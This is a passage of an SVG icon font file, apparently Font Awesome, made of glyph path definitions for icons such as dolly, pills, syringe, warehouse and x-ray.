c0.699219 -5 1.7998 -11.0996 3.39941 -18.0996h312.4c1.59961 7 2.7002 13.2002 3.39941 18.0996c1.10059 8 7.90039 13.9004 16 13.9004l32.4004 -0.0996094c9.59961 0 17 -8.30078 15.9004 -17.8008c-5.80078 -47.8994 -37.4004 -181.199 -209.5 -266.699
c-31.7002 -15.8008 -57.4004 -33.3008 -78.7002 -51.4004h127.6c-5.59961 4.7998 -10.7998 9.59961 -17 14.2002c21.4004 11.2002 40.9004 23 58.5 35.3994c93.2998 -78.6992 114.3 -169.8 118.9 -207.699c1.2002 -9.5 -6.2998 -17.8008 -15.9004 -17.8008
l-32.2998 -0.0996094c-8.09961 -0.0996094 -14.9004 5.90039 -16 13.9004c-0.599609 4.89941 -1.90039 11.1992 -3.5 18.0996h-312.3c-1.60059 -7 -2.7002 -13.2002 -3.40039 -18.0996c-1.09961 -8 -7.89941 -13.9004 -16 -13.9004l-32.2998 0.0996094
c-9.59961 0 -17 8.30078 -15.9004 17.8008zM224 228.4c25.0996 13.5996 46.4004 28.3994 64.2002 43.5996h-128.5c17.8994 -15.2002 39.2002 -29.9004 64.2998 -43.5996zM355.1 352h-262.1c5.7002 -10.4004 12.7002 -21.0996 21 -32h220.1
c8.2002 10.9004 15.2002 21.5996 21 32zM92.9004 32h261.6c-5.7998 10.4004 -12.9004 21.0996 -21.2002 32h-219.399c-8.2002 -10.9004 -15.2002 -21.5996 -21 -32z" />
    <glyph glyph-name="dolly" unicode="&#xf472;" horiz-adv-x="576" 
d="M294.2 170.3l-53 159.4c-2.7998 8.2998 1.7002 17.3994 10.0996 20.2002l61.6006 20.5l33.0996 -99.4004l60.7002 20.0996l-33.1006 99.4004l61.1006 20.4004c8.2998 2.7998 17.3994 -1.7002 20.2002 -10.1006l60.3994 -181.2
c2.7998 -8.2998 -1.7002 -17.3994 -10.0996 -20.1992l-161.5 -53.8008c-14.7998 11.3008 -31.5 19.7002 -49.5 24.7002zM575.2 121.6c2.7998 -8.39941 -1.7998 -17.3994 -10.1006 -20.1992l-213.3 -71.2002c-1.09961 -57.7998 -53.2002 -103.3 -113.399 -92.6006
c-39.4004 6.90039 -71.2002 39.8008 -77.3008 79.2002c-5.69922 36.9004 9.90039 70.1006 36 90.5l-92.1992 276.7h-88.9004c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h112c13.7998 0 26 -8.7998 30.4004 -21.9004l99.3994 -298.199
c29.9004 -0.600586 56.2998 -15 73.5 -37l213.5 71.1992c8.2998 2.80078 17.4004 -1.69922 20.2002 -10.0996zM256 -16c26.5 0 48 21.5 48 48s-21.5 48 -48 48s-48 -21.5 -48 -48s21.5 -48 48 -48z" />
    <glyph glyph-name="dolly-flatbed" unicode="&#xf474;" horiz-adv-x="640" 
d="M208 128c-8.7998 0 -16 7.2002 -16 16v256c0 8.7998 7.2002 16 16 16h144v-128l48 32l48 -32v128h144c8.7998 0 16 -7.2002 16 -16v-256c0 -8.7998 -7.2002 -16 -16 -16h-384zM624 64c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-82.7998
c1.7002 -5 2.89941 -10.4004 2.89941 -16c0 -26.5 -21.5 -48 -48 -48s-48 21.5 -48 48c0 5.59961 1.10059 11 2.90039 16h-197.9c1.7002 -5 2.90039 -10.4004 2.90039 -16c0 -26.5 -21.5 -48 -48 -48s-48 21.5 -48 48c0 5.59961 1.09961 11 2.90039 16h-82.9004
c-8.7998 0 -16 7.2002 -16 16v368h-48c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h96c8.7998 0 16 -7.2002 16 -16v-368h496z" />
    <glyph glyph-name="file-medical" unicode="&#xf477;" horiz-adv-x="384" 
d="M377 343c4.5 -4.5 7 -10.5996 7 -16.9004v-6.09961h-128v128h6.09961c6.40039 0 12.5 -2.5 17 -7zM224 312c0 -13.2002 10.7998 -24 24 -24h136v-328c0 -13.2998 -10.7002 -24 -24 -24h-336c-13.2998 0 -24 10.7002 -24 24v464c0 13.2998 10.7002 24 24 24h200v-136z
M288 152c0 4.40039 -3.59961 8 -8 8h-56v56c0 4.40039 -3.59961 8 -8 8h-48c-4.40039 0 -8 -3.59961 -8 -8v-56h-56c-4.40039 0 -8 -3.59961 -8 -8v-48c0 -4.40039 3.59961 -8 8 -8h56v-56c0 -4.40039 3.59961 -8 8 -8h48c4.40039 0 8 3.59961 8 8v56h56
c4.40039 0 8 3.59961 8 8v48z" />
    <glyph glyph-name="file-medical-alt" unicode="&#xf478;" horiz-adv-x="448" 
d="M288 312c0 -13.2002 10.7998 -24 24 -24h136v-328c0 -13.2998 -10.7002 -24 -24 -24h-336c-13.2998 0 -24 10.7002 -24 24v168h70.0996l34.8008 -69.5c2.89941 -5.90039 11.3994 -5.90039 14.2998 0l56.7998 113.7l22.0996 -44.2002h89.9004c8.7998 0 16 7.2002 16 16
s-7.2002 16 -16 16h-70.2002l-34.7002 69.5c-2.89941 5.90039 -11.3994 5.90039 -14.2998 0l-56.7998 -113.7l-19.9004 39.7998c-1.39941 2.7002 -4.19922 4.40039 -7.19922 4.40039h-140.9c-4.40039 0 -8 3.59961 -8 8v16c0 4.40039 3.59961 8 8 8h56v232
c0 13.2998 10.7002 24 24 24h200v-136zM441 343c4.5 -4.5 7 -10.5996 7 -16.9004v-6.09961h-128v128h6.09961c6.40039 0 12.5 -2.5 17 -7z" />
    <glyph glyph-name="first-aid" unicode="&#xf479;" horiz-adv-x="576" 
d="M0 368c0 26.5 21.5 48 48 48h48v-448h-48c-26.5 0 -48 21.5 -48 48v352zM128 -32v448h320v-448h-320zM192 216v-48c0 -4.40039 3.59961 -8 8 -8h56v-56c0 -4.40039 3.59961 -8 8 -8h48c4.40039 0 8 3.59961 8 8v56h56c4.40039 0 8 3.59961 8 8v48
c0 4.40039 -3.59961 8 -8 8h-56v56c0 4.40039 -3.59961 8 -8 8h-48c-4.40039 0 -8 -3.59961 -8 -8v-56h-56c-4.40039 0 -8 -3.59961 -8 -8zM528 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-48v448h48z" />
    <glyph glyph-name="hospital-alt" unicode="&#xf47d;" horiz-adv-x="576" 
d="M544 352c17.7002 0 32 -14.2998 32 -32v-368c0 -8.7998 -7.2002 -16 -16 -16h-544c-8.7998 0 -16 7.2002 -16 16v368c0 17.7002 14.2998 32 32 32h128v64c0 17.7002 14.2998 32 32 32h192c17.7002 0 32 -14.2998 32 -32v-64h128zM160 12v40c0 6.59961 -5.40039 12 -12 12
h-40c-6.59961 0 -12 -5.40039 -12 -12v-40c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12zM160 140v40c0 6.59961 -5.40039 12 -12 12h-40c-6.59961 0 -12 -5.40039 -12 -12v-40c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12zM320 12v40
c0 6.59961 -5.40039 12 -12 12h-40c-6.59961 0 -12 -5.40039 -12 -12v-40c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12zM320 140v40c0 6.59961 -5.40039 12 -12 12h-40c-6.59961 0 -12 -5.40039 -12 -12v-40c0 -6.59961 5.40039 -12 12 -12h40
c6.59961 0 12 5.40039 12 12zM336 310v20c0 3.2998 -2.7002 6 -6 6h-26v26c0 3.2998 -2.7002 6 -6 6h-20c-3.2998 0 -6 -2.7002 -6 -6v-26h-26c-3.2998 0 -6 -2.7002 -6 -6v-20c0 -3.2998 2.7002 -6 6 -6h26v-26c0 -3.2998 2.7002 -6 6 -6h20c3.2998 0 6 2.7002 6 6v26h26
c3.2998 0 6 2.7002 6 6zM480 12v40c0 6.59961 -5.40039 12 -12 12h-40c-6.59961 0 -12 -5.40039 -12 -12v-40c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12zM480 140v40c0 6.59961 -5.40039 12 -12 12h-40c-6.59961 0 -12 -5.40039 -12 -12v-40
c0 -6.59961 5.40039 -12 12 -12h40c6.59961 0 12 5.40039 12 12z" />
    <glyph glyph-name="hospital-symbol" unicode="&#xf47e;" 
d="M256 448c141.4 0 256 -114.6 256 -256s-114.6 -256 -256 -256s-256 114.6 -256 256s114.6 256 256 256zM368 72v240c0 4.40039 -3.59961 8 -8 8h-48c-4.40039 0 -8 -3.59961 -8 -8v-88h-96v88c0 4.40039 -3.59961 8 -8 8h-48c-4.40039 0 -8 -3.59961 -8 -8v-240
c0 -4.40039 3.59961 -8 8 -8h48c4.40039 0 8 3.59961 8 8v88h96v-88c0 -4.40039 3.59961 -8 8 -8h48c4.40039 0 8 3.59961 8 8z" />
    <glyph glyph-name="id-card-alt" unicode="&#xf47f;" horiz-adv-x="576" 
d="M528 384c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-480c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h144v-96h192v96h144zM288 224c-35.2998 0 -64 -28.7002 -64 -64s28.7002 -64 64 -64s64 28.7002 64 64s-28.7002 64 -64 64zM381.3 0
c10.4004 0 18.7998 10 15.6006 19.7998c-8.40039 25.7002 -32.5 44.2002 -60.9004 44.2002h-8.2002c-12.2002 -5.09961 -25.7002 -8 -39.7998 -8s-27.5 2.90039 -39.7998 8h-8.2002c-28.5 0 -52.5996 -18.5996 -60.9004 -44.2002
c-3.19922 -9.7998 5.2002 -19.7998 15.6006 -19.7998h186.6zM352 416v-96h-128v96c0 17.7002 14.2998 32 32 32h64c17.7002 0 32 -14.2998 32 -32z" />
    <glyph glyph-name="notes-medical" unicode="&#xf481;" horiz-adv-x="384" 
d="M336 384c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-288c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h80c0 35.2998 28.7002 64 64 64s64 -28.7002 64 -64h80zM192 408c-13.2998 0 -24 -10.7002 -24 -24s10.7002 -24 24 -24s24 10.7002 24 24
s-10.7002 24 -24 24zM288 104v48c0 4.40039 -3.59961 8 -8 8h-56v56c0 4.40039 -3.59961 8 -8 8h-48c-4.40039 0 -8 -3.59961 -8 -8v-56h-56c-4.40039 0 -8 -3.59961 -8 -8v-48c0 -4.40039 3.59961 -8 8 -8h56v-56c0 -4.40039 3.59961 -8 8 -8h48c4.40039 0 8 3.59961 8 8
v56h56c4.40039 0 8 3.59961 8 8zM288 296v16c0 4.40039 -3.59961 8 -8 8h-176c-4.40039 0 -8 -3.59961 -8 -8v-16c0 -4.40039 3.59961 -8 8 -8h176c4.40039 0 8 3.59961 8 8z" />
    <glyph glyph-name="pallet" unicode="&#xf482;" horiz-adv-x="640" 
d="M144 192c-8.7998 0 -16 7.2002 -16 16v224c0 8.7998 7.2002 16 16 16h112v-128l64 32l64 -32v128h112c8.7998 0 16 -7.2002 16 -16v-224c0 -8.7998 -7.2002 -16 -16 -16h-352zM624 64h-48v-64h48c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-608
c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h48v64h-48c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h608c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16zM288 0v64h-160v-64h160zM512 0v64h-160v-64h160z" />
    <glyph glyph-name="pills" unicode="&#xf484;" horiz-adv-x="575" 
d="M112 416c61.9004 0 112 -50.0996 112 -112v-224c0 -61.9004 -50.0996 -112 -112 -112s-112 50.0996 -112 112v224c0 61.9004 50.0996 112 112 112zM160 192v112c0 26.5 -21.5 48 -48 48s-48 -21.5 -48 -48v-112h96zM299.7 221.7l210.8 -210.8
c3.5 -3.5 3.2002 -9.40039 -0.799805 -12.3008c-62.5 -45.2998 -150.101 -40.3994 -206.4 15.9004s-61.2002 143.9 -15.8994 206.4c2.89941 3.89941 8.7998 4.2998 12.2998 0.799805zM529.5 240.7c56.4004 -56.2998 61.2002 -143.8 15.9004 -206.4
c-2.90039 -3.89941 -8.80078 -4.2998 -12.3008 -0.799805l-210.8 210.8c-3.5 3.5 -3.2002 9.40039 0.799805 12.2998c62.5 45.3008 150.101 40.4004 206.4 -15.8994z" />
    <glyph glyph-name="prescription-bottle" unicode="&#xf485;" horiz-adv-x="384" 
d="M32 256v64h320v-352c0 -17.5996 -14.4004 -32 -32 -32h-256c-17.5996 0 -32 14.4004 -32 32v64h120c4.40039 0 8 3.59961 8 8v16c0 4.40039 -3.59961 8 -8 8h-120v64h120c4.40039 0 8 3.59961 8 8v16c0 4.40039 -3.59961 8 -8 8h-120v64h120c4.40039 0 8 3.59961 8 8v16
c0 4.40039 -3.59961 8 -8 8h-120zM360 448c13.2002 0 24 -10.7998 24 -24v-48c0 -13.2002 -10.7998 -24 -24 -24h-336c-13.2002 0 -24 10.7998 -24 24v48c0 13.2002 10.7998 24 24 24h336z" />
    <glyph glyph-name="prescription-bottle-alt" unicode="&#xf486;" horiz-adv-x="384" 
d="M360 448c13.2002 0 24 -10.7998 24 -24v-48c0 -13.2002 -10.7998 -24 -24 -24h-336c-13.2002 0 -24 10.7998 -24 24v48c0 13.2002 10.7998 24 24 24h336zM32 -32v352h320v-352c0 -17.5996 -14.4004 -32 -32 -32h-256c-17.5996 0 -32 14.4004 -32 32zM96 152v-48
c0 -4.40039 3.59961 -8 8 -8h56v-56c0 -4.40039 3.59961 -8 8 -8h48c4.40039 0 8 3.59961 8 8v56h56c4.40039 0 8 3.59961 8 8v48c0 4.40039 -3.59961 8 -8 8h-56v56c0 4.40039 -3.59961 8 -8 8h-48c-4.40039 0 -8 -3.59961 -8 -8v-56h-56c-4.40039 0 -8 -3.59961 -8 -8z
" />
    <glyph glyph-name="procedures" unicode="&#xf487;" horiz-adv-x="640" 
d="M528 224c61.9004 0 112 -50.0996 112 -112v-160c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v48h-512v-48c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v352c0 8.7998 7.2002 16 16 16h32c8.7998 0 16 -7.2002 16 -16v-240h192
v144c0 8.7998 7.2002 16 16 16h256zM136 352c-4.40039 0 -8 3.59961 -8 8v16c0 4.40039 3.59961 8 8 8h140.9c3.09961 0 5.7998 -1.7002 7.19922 -4.40039l19.9004 -39.7998l49.7002 99.4004c5.89941 11.7998 22.7002 11.7998 28.5996 0l27.6006 -55.2002h102.1
c8.7998 0 16 -7.2002 16 -16s-7.2002 -16 -16 -16h-121.9l-22.0996 44.2002l-49.7002 -99.4004c-5.89941 -11.7998 -22.7002 -11.7998 -28.5996 0l-27.6006 55.2002h-126.1zM160 96c-35.2998 0 -64 28.7002 -64 64s28.7002 64 64 64s64 -28.7002 64 -64
s-28.7002 -64 -64 -64z" />
    <glyph glyph-name="shipping-fast" unicode="&#xf48b;" horiz-adv-x="640" 
d="M624 96c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-48c0 -53 -43 -96 -96 -96s-96 43 -96 96h-128c0 -53 -43 -96 -96 -96s-96 43 -96 96v128h152c4.40039 0 8 3.59961 8 8v16c0 4.40039 -3.59961 8 -8 8h-208c-4.40039 0 -8 3.59961 -8 8v16
c0 4.40039 3.59961 8 8 8h240c4.40039 0 8 3.59961 8 8v16c0 4.40039 -3.59961 8 -8 8h-208c-4.40039 0 -8 3.59961 -8 8v16c0 4.40039 3.59961 8 8 8h240c4.40039 0 8 3.59961 8 8v16c0 4.40039 -3.59961 8 -8 8h-272c-4.40039 0 -8 3.59961 -8 8v16
c0 4.40039 3.59961 8 8 8h56v48c0 26.5 21.5 48 48 48h256c26.5 0 48 -21.5 48 -48v-48h44.0996c12.7002 0 24.9004 -5.09961 33.9004 -14.0996l99.9004 -99.9004c9 -9 14.0996 -21.2002 14.0996 -33.9004v-108.1h16zM160 -16c26.5 0 48 21.5 48 48s-21.5 48 -48 48
s-48 -21.5 -48 -48s21.5 -48 48 -48zM480 -16c26.5 0 48 21.5 48 48s-21.5 48 -48 48s-48 -21.5 -48 -48s21.5 -48 48 -48zM560 192v12.0996l-99.9004 99.9004h-44.0996v-112h144z" />
    <glyph glyph-name="smoking" unicode="&#xf48d;" horiz-adv-x="640" 
d="M632 96c4.40039 0 8 -3.59961 8 -8v-144c0 -4.40039 -3.59961 -8 -8 -8h-48c-4.40039 0 -8 3.59961 -8 8v144c0 4.40039 3.59961 8 8 8h48zM553.3 360.9c54.2998 -36.4004 86.7002 -97.1006 86.7002 -162.601v-30.2998c0 -4.40039 -3.59961 -8 -8 -8h-48
c-4.40039 0 -8 3.59961 -8 8v30.2998c0 50.2002 -25.2002 96.7002 -67.4004 124c-18.3994 12 -28.5996 33.4004 -28.5996 55.4004v62.2998c0 4.40039 3.59961 8 8 8h48c4.40039 0 8 -3.59961 8 -8v-62.2998c0 -6.7998 3.59961 -13 9.2998 -16.7998zM432 96
c8.7998 0 16 -7.2002 16 -16v-128c0 -8.7998 -7.2002 -16 -16 -16h-384c-26.5 0 -48 21.5 -48 48v64c0 26.5 21.5 48 48 48h384zM400 -16v64h-176v-64h176zM487.7 306.4c35.2998 -24.7002 56.2998 -64.8008 56.2998 -108.101v-30.2998c0 -4.40039 -3.59961 -8 -8 -8h-48
c-4.40039 0 -8 3.59961 -8 8v30.2998c0 27.4004 -13.2998 52.9004 -35.7002 68.6006c-35.7002 25.0996 -60.2998 63 -60.2998 106.699v66.4004c0 4.40039 3.59961 8 8 8h48c4.40039 0 8 -3.59961 8 -8v-62.2998c0 -29 15.7998 -54.7002 39.7002 -71.2998zM536 96
c4.40039 0 8 -3.59961 8 -8v-144c0 -4.40039 -3.59961 -8 -8 -8h-48c-4.40039 0 -8 3.59961 -8 8v144c0 4.40039 3.59961 8 8 8h48z" />
    <glyph glyph-name="syringe" unicode="&#xf48e;" 
d="M201.5 273.2l64.9004 65l135.699 -135.7l-181.899 -181.9c-17.5 -17.5996 -41.5 -25.5996 -65.4004 -23l-63.5996 7.10059l-66.2998 -66.2998c-3.10059 -3.10059 -8.2002 -3.10059 -11.3008 0l-11.2998 11.2998c-3.09961 3.09961 -3.09961 8.2002 0 11.2998
l66.4004 66.4004l-7.10059 63.5996c-2.59961 24.2998 5.7002 48.0996 23 65.4004l26.4004 26.3994l55.7998 -55.8994c3.10059 -3.10059 8.2002 -3.10059 11.2998 0l11.3008 11.2998c3.09961 3.09961 3.09961 8.2002 0 11.2998l-55.8008 55.7998l45.3008 45.2998
l55.6992 -55.7998c3.10059 -3.09961 8.2002 -3.09961 11.3008 0l11.2998 11.2998c3.09961 3.10059 3.09961 8.2002 0 11.3008zM509.7 366.5c3.09961 -3.2002 3.09961 -8.2002 0 -11.4004l-11.2998 -11.2998c-3.10059 -3.09961 -8.2002 -3.09961 -11.3008 0l-28.2998 28.2998
l-45.2998 -45.2998l73.5 -73.5c3.09961 -3.09961 3.09961 -8.2002 0 -11.2998l-33.9004 -34c-3.09961 -3.09961 -8.19922 -3.09961 -11.2998 0l-17 17l-135.7 135.9l-17 17c-3.09961 3.09961 -3.09961 8.19922 0 11.2998l33.9004 33.8994
c3.09961 3.10059 8.2002 3.10059 11.2998 0l17 -17l56.6006 -56.5996l45.2998 45.2998l-28.2998 28.2998c-3.10059 3.10059 -3.10059 8.2002 0 11.3008l11.2998 11.2998c3.09961 3.09961 8.2002 3.09961 11.2998 0z" />
    <glyph glyph-name="tablets" unicode="&#xf490;" horiz-adv-x="639" 
d="M160 256c81.0996 0 147.5 -58.5 160 -134.7c0.799805 -4.7998 -3.2998 -9.2998 -8.2998 -9.2998h-303.3c-5 0 -9.10059 4.5 -8.30078 9.2998c12.4004 76.2002 78.8008 134.7 159.9 134.7zM311.6 80c5 0 9.10059 -4.5 8.30078 -9.2998
c-12.4004 -76.2002 -78.8008 -134.7 -159.9 -134.7s-147.5 58.5 -159.9 134.7c-0.799805 4.7998 3.30078 9.2998 8.30078 9.2998h303.199zM593.4 401.4c56.5 -56.5 61.3994 -144.2 15.8994 -206.9c-2.7998 -4 -8.7998 -4.2998 -12.2998 -0.799805l-211.3 211.399
c-3.5 3.40039 -3.2002 9.40039 0.799805 12.3008c62.7002 45.3994 150.4 40.5 206.9 -16zM363 382.3l211.3 -211.3c3.5 -3.40039 3.2002 -9.40039 -0.799805 -12.2998c-62.7002 -45.5 -150.4 -40.6006 -206.9 15.8994c-56.3994 56.5 -61.2998 144.2 -15.8994 206.9
c2.7998 4 8.7998 4.2998 12.2998 0.799805z" />
    <glyph glyph-name="thermometer" unicode="&#xf491;" 
d="M476.8 427.6c49.4004 -40.6992 42.1006 -107.3 7.2002 -142.199l-254.2 -253.301h-99.8994l-89 -89c-9.30078 -9.39941 -24.5 -9.39941 -33.9004 0c-9.40039 9.30078 -9.40039 24.5 0 33.9004l89 89v100.9l45.2998 45.6992l50.1006 -50.1992
c3.09961 -3.10059 8.19922 -3.10059 11.2998 0l11.2998 11.2998c3.09961 3.09961 3.09961 8.2002 0 11.2998l-50.0996 50.2002l45.0996 45.3994l50.2998 -50.1992c3.10059 -3.10059 8.2002 -3.10059 11.2998 0l11.3008 11.2998c3.09961 3.09961 3.09961 8.2002 0 11.2998
l-50.3008 50.4004l45.1006 45.3994l50.3994 -50.5c3.10059 -3.09961 8.2002 -3.09961 11.3008 0l11.2998 11.2998c3.09961 3.10059 3.09961 8.2002 0 11.3008l-50.5 50.5l45.7002 46c36.3994 36.5 94.3994 40.8994 131.899 10.1992z" />
    <glyph glyph-name="vial" unicode="&#xf492;" horiz-adv-x="480" 
d="M477.7 261.9c3.09961 -3.10059 3.09961 -8.2002 0 -11.2002l-34 -33.9004c-3.10059 -3.09961 -8.2002 -3.09961 -11.2998 0l-11.2002 11.1006l-246.3 -245.7c-20.1006 -20.1006 -46.5 -30.1006 -72.9004 -30.1006c-28.9004 -0.0996094 -57.7998 11.9004 -78.4004 35.9004
c-35.6992 41.5 -29.3994 104.8 9.40039 143.5l242.4 241.9l-11.2002 11.0996c-3.10059 3.09961 -3.10059 8.2002 0 11.2998l34 33.9004c3.09961 3.09961 8.2002 3.09961 11.2998 0zM318 192l69.5 69.4004l-78.5 78.2998l-148 -147.7h157z" />
    <glyph glyph-name="vials" unicode="&#xf493;" horiz-adv-x="640" 
d="M72 384c-4.40039 0 -8 3.59961 -8 8v48c0 4.40039 3.59961 8 8 8h208c4.40039 0 8 -3.59961 8 -8v-48c0 -4.40039 -3.59961 -8 -8 -8h-24v-240c0 -44.0996 -35.9004 -80 -80 -80s-80 35.9004 -80 80v240h-24zM144 384v-96h64v96h-64zM624 0c8.7998 0 16 -7.2002 16 -16
v-32c0 -8.7998 -7.2002 -16 -16 -16h-608c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h608zM360 384c-4.40039 0 -8 3.59961 -8 8v48c0 4.40039 3.59961 8 8 8h208c4.40039 0 8 -3.59961 8 -8v-48c0 -4.40039 -3.59961 -8 -8 -8h-24v-240
c0 -44.0996 -35.9004 -80 -80 -80s-80 35.9004 -80 80v240h-24zM432 384v-96h64v96h-64z" />
    <glyph glyph-name="warehouse" unicode="&#xf494;" horiz-adv-x="640" 
d="M504 96c4.40039 0 8 -3.59961 8 -8v-48c0 -4.40039 -3.59961 -8 -8 -8h-367.7c-4.39941 0 -8 3.59961 -8 8l0.100586 48c0 4.40039 3.59961 8 8 8h367.6zM504 0c4.40039 0 8 -3.59961 8 -8v-48c0 -4.40039 -3.59961 -8 -8 -8h-368c-4.40039 0 -8 3.59961 -8 8
l0.0996094 48c0 4.40039 3.60059 8 8 8h367.9zM504 192c4.40039 0 8 -3.59961 8 -8v-48c0 -4.40039 -3.59961 -8 -8 -8h-367.5c-4.40039 0 -8 3.59961 -8 8l0.0996094 48c0 4.40039 3.60059 8 8 8h367.4zM610.5 331c17.7998 -7.5 29.5 -24.9004 29.5 -44.2998v-342.7
c0 -4.40039 -3.59961 -8 -8 -8h-80c-4.40039 0 -8 3.59961 -8 8v248c0 17.5996 -14.5996 32 -32.5996 32h-382.801c-18 0 -32.5996 -14.4004 -32.5996 -32v-248c0 -4.40039 -3.59961 -8 -8 -8h-80c-4.40039 0 -8 3.59961 -8 8v342.7c0 19.3994 11.7002 36.7998 29.5 44.2998
l272 113.3c4.89062 2.0293 13.1553 3.6748 18.4502 3.6748c5.29395 0 13.5596 -1.64551 18.4502 -3.6748z" />
    <glyph glyph-name="weight" unicode="&#xf496;" 
d="M448 384c35.29 0 64 -28.71 64 -64v-320c0 -35.29 -28.71 -64 -64 -64h-384c-35.29 0 -64 28.71 -64 64v320c0 35.29 28.71 64 64 64h25.9805c-16.4209 -28.2803 -25.9805 -61.0098 -25.9805 -96c0 -105.87 86.1299 -192 192 -192s192 86.1299 192 192
c0 34.9902 -9.55957 67.7197 -25.9805 96h25.9805zM256 128c-88.3701 0 -160 71.6299 -160 160s71.6299 160 160 160s160 -71.6299 160 -160s-71.6299 -160 -160 -160zM255.7 279.94c-21.9404 -0.170898 -39.7002 -17.96 -39.7002 -39.9404c0 -22.0898 17.9102 -40 40 -40
s40 17.9102 40 40c0 10.5498 -4.26953 20 -10.9502 27.1602l33.6699 78.5498c3.4707 8.11035 -0.290039 17.5205 -8.41016 21c-8.08984 3.50977 -17.5293 -0.240234 -21.0293 -8.41016z" />
    <glyph glyph-name="x-ray" unicode="&#xf497;" horiz-adv-x="640" 
d="M240 64c8.7998 0 16 -7.2002 16 -16s-7.2002 -16 -16 -16s-16 7.2002 -16 16s7.2002 16 16 16zM400 32c-8.7998 0 -16 7.2002 -16 16s7.2002 16 16 16s16 -7.2002 16 -16s-7.2002 -16 -16 -16zM624 448c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16
h-608c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h608zM624 0c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-608c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h48v352h512v-352h48zM480 200v16c0 4.40039 -3.59961 8 -8 8
h-136v32h104c4.40039 0 8 3.59961 8 8v16c0 4.40039 -3.59961 8 -8 8h-104v24c0 4.40039 -3.59961 8 -8 8h-16c-4.40039 0 -8 -3.59961 -8 -8v-24h-104c-4.40039 0 -8 -3.59961 -8 -8v-16c0 -4.40039 3.59961 -8 8 -8h104v-32h-136c-4.40039 0 -8 -3.59961 -8 -8v-16
c0 -4.40039 3.59961 -8 8 -8h136v-32h-104c-4.40039 0 -8 -3.59961 -8 -8v-16c0 -4.40039 3.59961 -8 8 -8h104v-32h-64c-26.5 0 -48 -21.5 -48 -48s21.5 -48 48 -48s48 21.5 48 48v16h64v-16c0 -26.5 21.5 -48 48 -48s48 21.5 48 48s-21.5 48 -48 48h-64v32h104
c4.40039 0 8 3.59961 8 8v16c0 4.40039 -3.59961 8 -8 8h-104v32h136c4.40039 0 8 3.59961 8 8z" />
    <glyph glyph-name="box-open" unicode="&#xf49e;" horiz-adv-x="640" 
d="M425.7 192c4.5 0 9 0.599609 13.2998 1.90039l137 39.0996v-178c0 -14.5996 -10 -27.4004 -24.2002 -31l-216.399 -54.0996c-10.1006 -2.5 -20.8008 -2.5 -31 0l-216.2 54.0996c-14.2002 3.5 -24.2002 16.2998 -24.2002 31v178l137 -39.2002
c4.2998 -1.2998 8.7998 -1.89941 13.2998 -1.89941c16.9004 0 32.7998 9 41.5 23.5l64.2002 106.6l64.2998 -106.6c8.60059 -14.4004 24.5 -23.4004 41.4004 -23.4004zM638.3 304.2c4.5 -9.2002 -0.299805 -20.2002 -10.2002 -23.1006l-197.899 -56.5
c-7.10059 -2 -14.7002 1 -18.5 7.30078l-91.7002 152.1l250.1 31.9004c6.90039 0.899414 13.6006 -2.7002 16.7002 -8.90039zM53.2002 407c3.09961 6.2002 9.7002 9.7002 16.5996 8.90039l250.2 -31.9004l-91.7998 -152c-3.7998 -6.2998 -11.4004 -9.2998 -18.5 -7.2998
l-197.9 56.5c-9.7998 2.7998 -14.7002 13.7998 -10.0996 23z" />
    <glyph glyph-name="comment-dots" unicode="&#xf4ad;" 
d="M256 416c141.4 0 256 -93.0996 256 -208s-114.6 -208 -256 -208c-38.4004 0 -74.7002 7.09961 -107.4 19.4004c-24.5996 -19.6006 -74.2998 -51.4004 -140.6 -51.4004c-3.2002 0 -6 1.7998 -7.2998 4.7998s-0.700195 6.40039 1.5 8.7002
c0.5 0.5 42.2998 45.4004 54.7998 95.7998c-35.5996 35.7002 -57 81.1006 -57 130.7c0 114.9 114.6 208 256 208zM128 176c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32zM256 176c17.7002 0 32 14.2998 32 32
s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32zM384 176c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32z" />
    <glyph glyph-name="comment-slash" unicode="&#xf4b3;" horiz-adv-x="640" 
d="M64 208c0 18.5996 3.2998 36.5 8.90039 53.5996l325.5 -251.6c-24.7002 -6.40039 -51 -10 -78.4004 -10c-38.4004 0 -74.7002 7.09961 -107.4 19.4004c-24.5996 -19.6006 -74.2998 -51.4004 -140.6 -51.4004c-3.2002 0 -6 1.90039 -7.2998 4.7998
